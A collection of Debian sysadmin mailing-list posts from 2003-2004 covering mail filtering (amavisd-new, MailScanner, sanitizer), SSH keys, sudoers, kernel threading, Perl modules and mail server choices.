I'm sure this info is googlable but after 30 minutes I can't find it... I can hear the discs on the server going wild, I run: sar -d 2 120 ...and disc utilization is indeed higher than normal. How do I find what process is driving up the i/o load? the command: top ..is great for CPU & RAM but doesn't do disc... -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
apt-get bcm5700-module-2.4.18
Two questions: 1) Has anyone done a: apt-get install bcm5700-module-2.4.18 ...with a stock 2.4.18 kernel or otherwise used this driver from without the package system. I would very much like to avoid custom compiling kernels so I can fix any future kernel security holes with apt-get update/upgrade -s/upgrade ? 2) Has anyone gotten different apt-cache search results using the same sources.list on different machines? On machine (A) the broadcom package above shows up, On machine B it does not. sources.list below: # See sources.list(5) for more information deb http://debian.lcs.mit.edu/debian woody main contrib non-free deb http://http.us.debian.org/debian woody main deb http://security.debian.org/ woody/updates main contrib non-free deb http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free # deb http://tiefighter.et.tudelft.nl/~arthur/cvsd ./ # deb-src http://http.us.debian.org/debian testing main contrib non-free deb-src http://debian.lcs.mit.edu/debian woody main contrib non-free deb-src http://http.us.debian.org/debian woody main contrib non-free deb-src http://security.debian.org/ woody/updates main contrib non-free deb-src http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Multiple Server routet to one location
All this assumes that you need to ration your dialup time. If not use something like freesco.org to make the connection on demand and use regular smtp/ftp/http etc to allow people remote access to your Strasbourg server(s) > ...and if I collect the Mail in Strasbourg, how can I send it effectif > to Problem-POP's ? uucp is the program/protocol designed to deliver mail over intermittent connections. I believe that from the mid 80s to the mid 90s, a lot of US email traveled over uucp over intermittent dialup lines instead of over smtp over dedicated connections A quick: apt-cache search uucp I did some quick googling... Below is a link to a Sendmail/uucp doc: http://www.fifi.org/doc/HOWTO/en-html/mini/Sendmail+UUCP.html I know you are running courier as your stmp server, but it might help get some general principles established. Getting this to and from port 25 or /var/spool/mail might be the same. As to allowing the remote sites to publish web pages, from experience in rural southeast USA 11 years ago, I'd guess that most people on the short end of a intermitant dial-up connection are most interested in email. Once that is working smoothly, I'd worry about other stuff. The minority that need/want to publish web pages on the full time Internet might get by with emailing them to the hub for a little while. Hope this helps. On Sun, 14 Dec 2003, Michelle Konzack wrote: > Hello, > > I have a small problem with the planning of my CyberCenter: > > In Strasbourg I have a Virtual-Webserver with the 'www' Host and the > 'strasbourg' Host. The internet connectivity is quiet well... > > This Server is in the same time the Router/Firewall and has 3 NIC's. > (external interface, admin-net and public-net with all the Workstations) > > Internal I have a nfs-Server where my Clients have a little Diskspace > (50 MByte) for Web (~/public_html) and Mail (~/Maildir). The Server is > running courier-(imap,mta) and apache. > > Then I have in different villes/countries POP's (other CyberCenters) > which have its own nfs-Servers. > > So I have following public: > > www.ccenter.org Main Web-Server > strasbourg.ccenter.orgnfs/apache/courier-Server where clients have: > E-Mail: [EMAIL PROTECTED] > Web:strasbourg.ccenter.org/~client/ > utopia.ccenter.orgsame as 'strasbourg' > > Now the Problem: > > The internet connectivity is in some locations only V.90 or ISDN, so > Web/Mail-Services are not possible permanently. > > Solution: > > All Web/Mail-Activity is routet via Strasbourg... > > OK, I can poll the Problem-POP's through a squid-cache using wget... > > But HOW ? > > ...and if I collect the Mail in Strasbourg, how can I send it effectif > to Problem-POP's ? > > I was thinking on collecting Mails and put it onto a shttp-cgi, which > tar it up after a wget-request (e.g. all 30 minutes). Then on the > Problem-POP it will decompressed and forward all Messages to procmail... > > Any suggestions ? > > > Thanks > Michelle > > P.S.: The Location is Ercec (Turkey) and Khoy (Iran) and there is > nothing ! > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Best Practices: CGI.pm & CSS2 ???
CSS is not deprecated. It is not reliable for positioning but it is quite
usable for defining text and character styles. If you have ever
changed all the font tags in a web site, you will be a CSS fan.
If you attempt to validate your HTML against w3.org's validator, you
are required to be a fan.
http://validator.w3.org/
It is probably not a good idea to use CGI.pm to produce HTML output. Why
learn another HTML syntax ? Something like HTML::Template or even a HERE
document will serve you better.
However it is very foolish to **Not** use CGI to parse input from a form.
It is much, much easier and safer than parsing the raw query string or
reading STDIN or escaping shell charactors or otherwise doing the job by
hand.
#!/usr/bin/perl -wT
use strict;
use CGI;
use CGI::Carp;
my $q= new CGI;
my $name = $q->param('first_name') || 0;
my $result =
Hello $name
hello $name
HERE
if ($name) {
print $result;
}
else {
print ;
}
# see perldoc perldata for __DATA__ file handle info
__DATA__
Content-Type: text/html; charset=ISO-8859-1
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>
simple form
Name:
#
On Tue, 30 Dec 2003, Chris Wagner wrote:
> I can tell you some stuff about that right now. CGI.pm is just a quick and
> dirty module that will save on some typing in your perl script. Emphasis on
> some. If you're doing anything more than basic html tags it quickly becomes
> not worth it anymore. Writing tag attributes takes up more time and space
> than just writing out the html itself. The one thing it's really good for
> is writing out tables. If you have an array with all your row data you can
> write something like print Tr( td([EMAIL PROTECTED]) ). That saves a lot of typing.
> The perldoc has most of the gritty details.
>
> Cascading Style Sheets. Deprecated. I have seen so many bad uses of style
> sheets it makes me want to cry out in anger. So just don't use them unless
> there's no other way to do it. They are almost guaranteed to cause
> compatibility problems. The problem is that some bonehead writes a style
> sheet that makes a webpage look good on *their* computer. To hell with
> everybody else who doesn't have the same monitor, resolution, fonts,
> browser, etc. The one thing they are "good" for is making themes but be
> careful that it's still ledgible on other machines. I have them turned off
> in my browser.
>
>
> At 10:50 PM 12/29/03 -0600, Michael D Schleif wrote:
> >Please, somebody point me to URL's that provide examples and best
> >practices of using CSS2, CGI.pm and XHTML v1.x.
> >
> >--
> >Best Regards,
>
>
>
>
>
> --
> REMEMBER THE WORLD TRADE CENTER ---=< WTC 911 >=--
> "...ne cede males"
>
> 0100
>
>
>
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
replacing sanitizer w/ amavisd-new
Right now we use sanitizer (stable package) to call a virus scanner and to strip script,img, style, etc tags We're thinking of switching to amavisd-new (unstable) and clamav (testing) because while sanitizer strips out the virus, it still passes the junk message through. We'd like to be able to drop virus infected messages to the floor. Another (very minor) consideration is that sanitizer is not a daemon and pays a speed penalty every time it is launched. The problem I see looking at the docs is that amavisd-new doesn't strip out potentially evil html. The direction, we're drifting is to run sanitizer after amavisd-new. (I think postfix can run filters in sequence) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: replacing sanitizer w/ amavisd-new
Thanks for your reply. > Might I suggest MailScanner? You might, some specific problems with amavisd-new that aren't present in MailScanner might be even more helpful. At: http://www.geocities.com/scottlhenderson/spamfilter.html they say: # mailscanner system, works with Postfix and other MTAs. This uses unsupported methods to manipulate Postfix queue files, and there are multiple reports of message duplication and/or delivery of truncated messages. # On Sat, 10 Jan 2004, Michael Loftis wrote: > Might I suggest MailScanner? For me it's been MUCH more reliable and > flexible. In fact I'm gearing up to replace amavisd-new with MailScanner > at work. We've run into some bugs with the latest version (4.24 > specifically), but the verison I'm using on FreeBSD 4.22.5 is solid, and > the version in debian stable 3.13.2 should also be very solid. > > It works with a slew of AV scanners,a nd integrating with one it doesn't > support natively is simple as editing a few files. The thing has about > 1000 some odd settings though so it can be daunting to set up. > > --On Saturday, January 10, 2004 15:12 -0500 Dan MacNeil > <[EMAIL PROTECTED]> wrote: > > > > > Right now we use sanitizer (stable package) to call a virus scanner and to > > strip script,img, style, etc tags > > > > We're thinking of switching to amavisd-new (unstable) and clamav (testing) > > because while sanitizer strips out the virus, it still passes the junk > > message through. We'd like to be able to drop virus infected messages to > > the floor. Another (very minor) consideration is that sanitizer is not a > > daemon and pays a speed penalty every time it is launched. > > > > The problem I see looking at the docs is that amavisd-new doesn't strip > > out potentially evil html. > > > > The direction, we're drifting is to run sanitizer after amavisd-new. (I > > think postfix can run filters in sequence) > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > > [EMAIL PROTECTED] > > > > > > > > -- > Michael Loftis > Modwest Sr. Systems Administrator > Powerful, Affordable Web Hosting > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: replacing sanitizer w/ amavisd-new
Thanks for your discussion. One correction, the muttering about "unsupported methods" is actually from: http://www.postfix.org/addon.html#content which is perhaps slightly more creditable than geocities. Googling around a bit I got this thread with thoughts from one of the main developers (Wietse Venema) http://archives.neohapsis.com/archives/postfix/2003-08/0511.html http://archives.neohapsis.com/archives/postfix/2003-08/0513.html http://archives.neohapsis.com/archives/postfix/2003-08/0514.html http://archives.neohapsis.com/archives/postfix/2003-08/0515.html http://archives.neohapsis.com/archives/postfix/2003-08/0522.html http://archives.neohapsis.com/archives/postfix/2003-08/0595.html [the threading at the archive was not good so I included links to whole thread] I might feel differently if our server was heavily burdened, but the prospect of breaking things with an upgrade to postfix not worth the speed. 3 On Sat, 10 Jan 2004, Michael Loftis wrote: > > > --On Saturday, January 10, 2004 21:53 -0500 Dan MacNeil > <[EMAIL PROTECTED]> wrote: > > > > > Thanks for your reply. > > > >> Might I suggest MailScanner? > > > > You might, some specific problems with amavisd-new that aren't present in > > MailScanner might be even more helpful. > > > > At: > > http://www.geocities.com/scottlhenderson/spamfilter.html > > > > they say: > > > ># mailscanner system, works with Postfix and other MTAs. This > > uses unsupported methods to manipulate Postfix queue files, and there are > > multiple reports of message duplication and/or delivery of truncated > > messages. > > It isn't exactly supported nor unsupportedBasically it relies on the > fact that postfix can be told to use deferred transports on inbound, > automatically forcing everything to go into the deferred queue. You run > one copy of postfix in that mode. Another in a normal mode, minus > smtp/incoming mail. I haven't had any problems with truncated email nor > duplicate deliveries at all with recent-ish Postfix. MAilscanner monitors > the deferred queue, pulling messages out of there and working on them, > putting them into the inbound pickup area on the other postfix instance > after processing. The sytem works well and is quick. > > I don't see how postfix could be responsible for multiple deliveries in > this scenario, nor how mailscanner would cause it. The only time that sort > of thing would happen is for people who don't follow the instructions and > don't put the three queues (mailscanner, inbound postfix, outbound postfix) > on the same partition/filesystem. This is a MUST. mailscanner simply > relinks the files into/out of work areas, this is fast, and atomic, > assuming it's on the same filesystem. Otherwise if it's not the same > filesystem you have to copy to/from staging areas to achieve the atomicity. > > > MailScanner catches about 30% more 'dangerous content' and virii than > amavisd-new given the same virus scanner because MS seems to unpack more > thoroughly/properly. MS supports/integrates the update system of all the > virus scanners it supports negating the need to run a separate update > cronjob all the time. MS supports throttles, amavisd does not, and so MS > will be much nicer to an overloaded/very briskly loaded system than > amavisd. amvisd requires copying the message multiple times, MS reduces > this by using the link/unlink method that all mailservers use nowadays > internally to their queues. > > MS does require running two separate copies of postfix, that amavisd does > not. There's a point for amavis. amavis eliminates unnecesary code from > the resultant script at ./configure time, MailScanner doesn't. That said > though MailScanner seems to work faster on my system. > > Not sure how much else to go on about this. > > -- > Michael Loftis > Modwest Sr. Systems Administrator > Powerful, Affordable Web Hosting > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: SSH Privat key and login as root without a passwort
> iam looking for generate a privat SSH-Key. There is a toolthe generates > Privat RSA keys. Now i have a privat key generated but where must i put > it in the Linux that linux know who ami and i didnt need a passwort for > login. You put the **private** key on the system you are connecting FROM, (in your case this looks like Putty) and you put the **public** key on the system you are connectiong TO. (in your case this looks like in ~/.ssh/authorized_keys) The docs for putty, ssh, ssh-keygen should be helpful: http://www.tartarus.org/~simon/puttydoc/Contents.html man ssh-keygen man sshd # see end for authorized_keys file info It is worth noting that putty can import/export openssh keys. Also you should check that the system administrator has not disallowed use of public/private keys for ssh authentication. (see /etc/ssh/sshd_config on the system you are connecting TO) On Sun, 18 Jan 2004, Fraser Campbell wrote: > On January 18, 2004 10:45 am, ournewsletter wrote: > > > put it in /root/.ssh/authorized_keys. I don't know if it works with the key > > produced by Putty, but with a "ssh-keygen"-generated public key it does. If > > you need more public keys to log in, simply name the key > > files /root/.ssh/authorized_keys2, /root/.ssh/authorized_keys3 ... > > Putty keys do works with openssh but you must edit them first. Putty keys > look rather like the ascii export of a gpg key, you must edit them so that > they look like this: > > ssh-rsa 89yh23wrnhjfdg... #all one line > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: apt-get and mounting /tmp with noexec option
How about running apache chroot'd so what apache thinks is /tmp and what apt-get thinks is /tmp are two different things? fstab would look something like: (untested) # /dev/sdc1 /var/www/tmp/ noexec, blah,blah,blah -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
shell access exploits (was Re: upgrading to MySQL 4 on woody)
> I have at most a week from a known kernel exploit to when one of my users > tries to exploit via shell access. One of my hats is a junior sys admin in an academic environment. I'm curious as to how you know when shell users are trying to exploit a kernel hole. In another non academic environment and based on info from this list, I've been running snoopy with an eye to grepping the logs for naughiness # On Mon, 19 Jan 2004, Lucas Albers wrote: > > Rod Rodolico said: > > > Becoming a firm believer that you CAN have it all, stability and the > > latest packages :) > > > > There are other places to get backports, BTW. This one works for me. > > > Rod, > Yes I agree with your statements. > Thanks for the link I'll use it on one of my systems... > > But you don't explicitly have security, you have the testing delay for > security updates, combined with the propagation time to backports from > testing. > > I'm still leery of using testing for any publicly exposed service, or for > machines with shell access. > I have at most a week from a known kernel exploit to when one of my users > tries to exploit via shell access. > > --Luke CS Sysadmin, Montana State University-Bozeman > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
changing max privledged port from 1024
How do you allow non root users to bind to ports below 1024 ? Alternatively, what iptables / tcpwrappers / xinetd / stunnel / magic thing should I be looking at to forward port 995 to port 5432 ? Our bandwidth provider (A university telcom dept) is filtering port 5432, the postgres port. On the political front things are proceeding slowly. We'd like to bind postgress to port 995 (etc/sertices says: pop3 over SSL) as this port is unlikely to be closed and we're not running pop3 over SSL on the database machine. Postgresql does not run as root and hence cannot bind to port 995 A morning of google and man sysctl have given teases but no answers. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Still Considering Debian - But Stuck!
I don't have a footnote, but I believe a recent linux journal article says that the 2.6 kernel uses a posix threads library which are much nicer than linux threads and that redhat has backported this support to RH9 and the 2.4 kernel. It should be possible to DL the redhat 2.4 patches On Mon, 2 Feb 2004, Dr. G Wu wrote: > RH9 support NTPL, which might explain your problem. > could you also have a look at this post. > http://forums.gentoo.org/viewtopic.php?t=38138 > It is a hot discussion about why Java is slower on Linux than on > Windows, slower on Gentoo than on RH9, whether NTPL would help boost > the performance. > regards, > Ben > > > On Monday 02 February 2004 6:24 pm, Fred Whipple wrote: > > Hi Everyone, > > > > A while back I asked for some feedback and got a very rich set of > > info from folks about Debian used in a stable ISP environment as > > compared to other OS's and distributions. All the info was very > > helpful and helped us further solidify our desire (though not yet > > decision) to make Debian our platform as we move forward. > > > > We've run into a couple rather HUGE issues, though, that I'd like > > to get further feedback on. Not that I couldn't figure it all out > > for myself, but nothing beats someone else's experience when it > > comes to saving me the time and heartache ;-) Just about everyone > > warned me that the stable Debian distribution would be old and well > > tested/maintained, but I'm not sure I was prepared for just HOW > > old... > > > > Our company uses Java --- a LOT of Java. We therefore use a lot of > > threads, and a lot of threads. And a whole mess of threads, too. > > Under Red Hat 7.3, we found that when the system had a total of > > say, 10,000 PID's given out (nearly all of them to threads) the > > system would become very unstable. When we moved to Red Hat 9 for > > the affected systems, which includes the new 0(1) scheduler, and > > either a different kind of thread support in either the kernel or > > GlibC, this problem went away. I'm honestly not sure who is > > responsible for the way threads are handled, and I suspect it's not > > exclusively the kernel, but under RH9 each JVM (or any app with > > threads) gets a single PID as normal and all very strange behavior > > that we saw under RH7.3 disappears. > > > > I see that Debian 3.0r2 includes a nicely aged (like fine cheese) > > Linux 2.2 kernel. While I'm certain the aging process only makes > > its flavour stronger and more delectable, I'm afraid it's going to > > choke at the thought of 10,000 threads. Say nothing of 20,000. > > Now I imagine it's not so difficult to simply compile a recent 2.4 > > (2.5?) kernel and go from there. Is this fair? Or would you > > suppose that the current stable Debian is too old in other areas to > > properly handle kernel 2.4? > > > > Even if I replace the kernel, I'm concerned that there's more > > involved with the more efficient handling of threads from RH 7.3 to > > RH 9 than just a kernel change -- I have to think there was a > > significant rework of some libraries that made threads more > > efficient under RH9 as well. Would anyone be able to identify > > exactly what that re-working was, and conjecture if they think it > > can be done under 3.0r2? For that matter, would I at that point be > > running so much new technology that I may as well be running an > > unstable distribution of Debian? > > > > Finally, while I'm messing around with the kernel, I'd have to > > include support for ext3fs. In our environment, journaling is not > > an option, it's a base requirement. Of course replacing the kernel > > would pretty much give me kernel-level support for it. From that > > point, how complicated is it to get the rest of the tools to play > > nicely with ext3fs? I'd imagine that a large set of tools would > > need to be replaced, including e2fsck, mount, umount, etc. > > > > Thanks once again for all the info so far! > > > > -Fred Whipple > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
configure anomy sanitizer to drop not defang ?
anomy sanitizer works well with postfix, but as far as I can tell, it can't be configured to drop messages instead of defanging them. I plan to configure sanitizer to add a tag to bad messages and then use procmail to quarantine messages with that tag. Is there better way? Is there something that does what sanitizer, works with postfix and allows me to drop messages completely? Mimedefang seems ideal, but it only works with sendmail. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: configure anomy sanitizer to drop not defang ?
> What's wrong with sendmail? Well, mostly that I've bought into the postfix fanboy propaganda that postfix is superior for speed, security, ease of use and world peace. ## On Thu, 5 Feb 2004, Lucas Albers wrote: > > Dan MacNeil said: > > > > anomy sanitizer works well with postfix, but as far as I can tell, it > > can't be configured to drop messages instead of defanging them. > > > > I plan to configure sanitizer to add a tag to bad messages and then use > > procmail to quarantine messages with that tag. Is there better way? > > > > Is there something that does what sanitizer, works with postfix and allows > > me to drop messages completely? > > > > Mimedefang seems ideal, but it only works with sendmail. > > What's wrong with sendmail? > I use it with mimedefang, and it works awesome. > I can do spam filtering, greylisting, ptr-helo checking, virus scanning, > extension filtering, mimetype-filtering, zipfile extension blocking,etc. > The correct behavior with mimedefang is to generate a bounce for rejected > spam, and discard for detected virus's. This is all at the 5xx level. > You can also query internal mail servers/ldap servers to determine if an > account exists before accepting mail from that sender or recipient. > So you only accept mail from a sender, if that sender exists on one of > your internal systems. > My external mx is a debian sendmail 8.12.3, mimedefang 2.38 system and it > handles all department mail load fine. > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: How do you manage Perl modules?
I'm in similar situation, last night I installed spamassassin & razor from backports.org. It seems to be working ok Fortunately for me, I don't have to worry about being forward compatible with an existing Bayes db. For you a (maybe painful) alternative to going to unstable is to discard your older Bayes and automatic whitelist files. Another alternative is to dump at least your whitelist to text, and then script an import btw, the first time you ran sa-learn did you get an error? something like like: "whatsits_foo.a not in @INC --needed for Digest::SHA1" I tried to make the problem go away with apt-get but got something like: "blah is already the current version" I succeeded in making the problem go away w/ /usr/bin/perl -MCPAN -e install Digest::SHA1 # On Sun, 8 Feb 2004, Craig Sanders wrote: > On Fri, Feb 06, 2004 at 05:41:18PM -0500, Kris Deugau wrote: > > However, I've just discovered that there's also a bad version mismatch > > between the "default" libdb version used by DB_File in RedHat, and the one in > > Debian (db3 in RedHat vs db1 [I think] in Debian). I also discovered that > > this has been included as a part of the monolithic perl-5.6.1 package, and I > > *really* don't want to go anywhere near backporting that myself or using a > > third-party backport. > > > > I discovered this in trying to get the SA2.63 install (from backports.org) to > > recognize the ~40M global Bayes dbs and per-user AWL files; instead I > > discover pairs of .dir + .pag files for AWL (which I vaguely recall are an > > artifact of db1) and SA won't open the existing bayes_* files. > > sounds like you've run into a reason to upgrade to unstable. > > you have three choices: > > 1. backport perl 5.8.x and libdb4 and all associated modules and other >packages. > > 2. try to find a backports archive where someone else has done the same. > > 3. point sources.list at unstable and either 'apt-get install' perl and >other packages, or 'apt-get dist-upgrade'. > > choice 1 is a lot of work. > > choice 2 doesn't really offer any benefits over just upgrading to 'unstable', > or upgrading certain packages to their 'unstable' versions. > > choice 3 will result in the least problems, and will be better tested - there > are far more people using unstable than there are using backports of perl. > > > Is there something like cpan2rpm or cpanflute for Debian? I'd like to > > pull in current versions of Perl modules > > dh-make-perl can fetch a package from CPAN and produce a working package that > is good enough for local use (but not "polished" enough to upload to debian for > re-distribution). > > > (or even just recompile the > > stable version against different libs). > > this is always an option. it's called 'back-porting'. download the debianised > source from unstable (along with any build dependancies) and build it. > > > > I *could* hack together some bits to force db3 to work by building on > > RedHat, and using alien to install... but that's just plain ugly and as > > I've already discovered it *will* break because of differences in how > > RedHat and Debian handle the core Perl install and addon modules. > > really, upgrading to 'unstable' will be the least-hassle option. > > 'unstable' means that the entire system is in flux, that it changes constantly. it > does not mean that the packages in it are unreliable. > > craig > > ps: i've been running ALL of my production servers on 'unstable' since 1995. > i upgrade them semi-regularly. no major problems. > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Community Network $8000 contest
I'm not affiliated with these folks but this $8000 contest may be of interest to folks on this list. Feel free to pass this on to other lists, this is the only list I'm sending it to. # Community Network Open Source Package Awards program http://www.afcn.org/opensource/ [...] A key service of most community networks (CNs) is providing Internet-based services to community, civic, and nonprofit groups. Community networks need an easy to install and easy to manage suite of information services that has an integrated and easy to use Web interface, so that volunteers and staff who are not Unix experts can set up, configure, and support service packages for local civic and community groups. With financial support from its partner, the University of Baltimore School of Information Arts and Technologies, the Association For Community Networking offers two awards of $4000 each for the Open Source-based service packages that most successfully meets all of the specifications outlined below. The two awards are designed to meet the needs of most community networks. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: qmail or postfix? (was: RE: What is the best mailling list manager for qmail and Domain Tech. Control ?)
> http://homepages.tesco.net/~J.deBoynePollard/Reviews/UnixMTSes/postfix.html says at the very bottom: Postfix is only available in source form, not as precompiled or prepackaged binaries. There is a list of FTP sites that hold the source tarball on the official web site. I have apt-get install'd postfix so I suspect this is not true. If this is an error, there may be others. The biggest complaint I've heard about qmail is that its license requires you to install binaries according to the taste of the creator. This means that things are the same on Debian solaris and redhat but also makes it less "standard" if all you use is one distribution. On Thu, 19 Feb 2004, Bjørnar Bjørgum Larsen wrote: > I am in the process of choosing between postfix and qmail for our mail > relays. I've not decided yet. However, I am surprised by the fact that > many people who prefer postfix, also enjoy posting unqualified[0] > statements[1][2][3] about qmail. > > If anyone have properly grounded views, please share! > > For example, I'd like comments on > http://homepages.tesco.net/~J.deBoynePollard/Reviews/UnixMTSes/postfix.html > and > http://homepages.tesco.net/~J.deBoynePollard/Reviews/UnixMTSes/qmail.html > > > > [0] A _qualified_ statement would e.g. be "qmail is trivially DoS'ed by sending > emails with no subject at a rate of 2 per second". Typical unqualified statements > are shown below. > > [1] Michael Loftis wrote (about qmail): > > First is, unless they've made design changes, > > it's trivial to DoS. > > Really? How would you DoS qmail? Could the same attack be used to DoS postfix? > > [2] Michael Loftis also wrote (about qmail): > > Second, it doesn't scale so well, but unless > > you're talking upwards of about 3-5k/msgs/hr > > you might not run into it. > > Really? Quoting Bernstein quoting Bill Weinman (cr.yp.to/qmail/users.html): > "Our busiest list is about 250 messages X 1800 subscribers > (avg mail deliveries: 450,000 transactions per day). Sendmail > was barfing badly on this, and qmail seems to be doing real > well. The machine is a Pentium 90 running Linux 2.0.13 with > 64Mb of RAM. I have the spawn limit set at 100. I am *very* > impressed." > > How was the qmail that didn't scale well configured? On what hardware? > > [3] Craig Sanders wrote: > > ps: qmail is a bad idea. postfix is better. > > Your conclusion may be right, but the arguments are missing. Would you please share? > > > Thanks, > > :) Bjornar > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
/etc/sudoers precedence question
Given the sudoers file below omacneil (as a member of wheel) should be able to do anything with a password and should be able to run "update" with no password. I can run everything but only with a password. What am I missing? reversing the order of %wheel & omacneil lines doesn't change things. ### # User privilege specification rootALL=(ALL) ALL ken ALL=(ALL) ALL Defaults!lecture, insults %wheel ALL=(ALL) ALL omacneil localhost=NOPASSWD: /usr/cs/2002/omacneil/sbin/update -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: /etc/sudoers precedence question
> Are you running the "update" command using the full path? > > /usr/cs/2002/omacneil/sbin/update I am prompted for a password if I say: sudo /usr/cs/2002/omacneil/sbin/update or if I say sudo update which update gives me /usr/cs/2002/omacneil/sbin/update. I am aware that the current sudo file allows sudo bash. The goal is audit rather than control. Thanks for the reply. On Sat, 21 Feb 2004, MB wrote: > Dan, > > Are you running the "update" command using the full path? > > /usr/cs/2002/omacneil/sbin/update > > > Your sudo file allows running the above command only with no password. > Also you should note that a sudo file like this allows for you to get a > root shell via "sudo bash", which may or may not be what you want to allow. > > Mark > > Dan MacNeil wrote: > > >Given the sudoers file below omacneil (as a member of wheel) should be > >able to do anything with a password and should be able to run "update" > >with no password. > > > >I can run everything but only with a password. > > > >What am I missing? > > > >reversing the order of %wheel & omacneil lines doesn't change things. > > > > > >### > ># User privilege specification > >rootALL=(ALL) ALL > >ken ALL=(ALL) ALL > > > >Defaults!lecture, insults > >%wheel ALL=(ALL) ALL > >omacneil localhost=NOPASSWD: /usr/cs/2002/omacneil/sbin/update > > > > > > > > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
web control panel|vpopmail / Tequila / courier / openLDAP / postfix
We're getting enough domains and email accounts that doing things by hand is getting to be a pain. (even with some scripts) We'd like to give our users a web control panel to handle email account administration for their own domains. We use: Postfix Courier-pop/imap Squirrelmail procmail sanitizer/f-prot spamassassin openLDAP (soon) Tequila seems almost perfect but it is in beta. http://www.holgilein.de/coolprox/tequila/ There are testing packages for vpopmail but it seems to require putting qmail into the mix. http://www.inter7.com/vpopmail/postfix.txt What are your experiences with these or other software libre web control panels? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: debian on HP proliant
> The installer from woody has built-in support for the cciss controller > on at least the Proliant DL 580 G2. > It works smoothly, but lacks support for the default installed 3com > gig-ethernet adapter (tg3 driver), once installed, The network installer for sarge detects the t3 gig-ethernet adaptor automagically. --We're moving to Sarge now. On Fri, 16 Apr 2004, Jose Alberto Guzman wrote: > Nathan Eric Norman wrote: > > On Fri, Jan 16, 2004 at 10:33:09AM -0500, Eric Sproul wrote: > > > >>On Fri, 2004-01-16 at 10:15, Francis Tyers wrote: > >> > >>>The onboard 'scsi' controller appears as a block device and not as a > >>>scsi device under linux. > >>> > >>>01:03.0 RAID bus controller: Compaq Computer Corporation Smart Array > >>>5i/532 (rev 01) > >>> > >>>i think it is... > >>> > >>>there is a driver in linux 2.4.x... > >> > >>The driver is called cciss, and supports the built in SmartArray > >>controller as well as the higher-end optional RAID controllers like the > >>641/642. > >> > >>Look in /proc/driver/cciss/ccissX (where X is the controller number, > >>usually '0' for the built-in) for some basic info. > >> > >>Devices attached to these controllers appear as /dev/cciss/cXdXpX > >> > >>c=controller # > >>d=logical drive # > >>p=partition # > >> > >>Thus the first partition on the first logical drive on the built-in > >>controller is /dev/cciss/c0d0p1. > > > > > > Is anyone aware of a debian-installer image which supports cciss built > > in? The existing d-i supports cciss just fine, but as a module. > > > > The installer from woody has built-in support for the cciss controller > on at least the Proliant DL 580 G2. > > It works smoothly, but lacks support for the default installed 3com > gig-ethernet adapter (tg3 driver), once installed, I usually either copy > a recent kernel source and compile whatever I need, or install an > eepro100 (or other supported) card to finish. > > The trick is to install with the bf24 kernel: version 2.4.18. > > Check the help at the Woody CD install boot prompt. > > > José > > > PS. > please reply to the list > > >
RaiserFS via NFS
I've just converted from mbox to maildir Right now there are some users with 500 files in a directory, I expect this go grow. I expect this figure to grow. RaiserFS is looking good. The benefits of running a central storage server and a bunch of seperate web/smtp/pop3/spamfiltering/ftp/ servers, one storage server running not much more than NFS all connected with a cheap Gigbit switch are also appealing to me. Is there any benefit to RaiserFS if I am accessing it via NFS ? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: RaiserFS via NFS
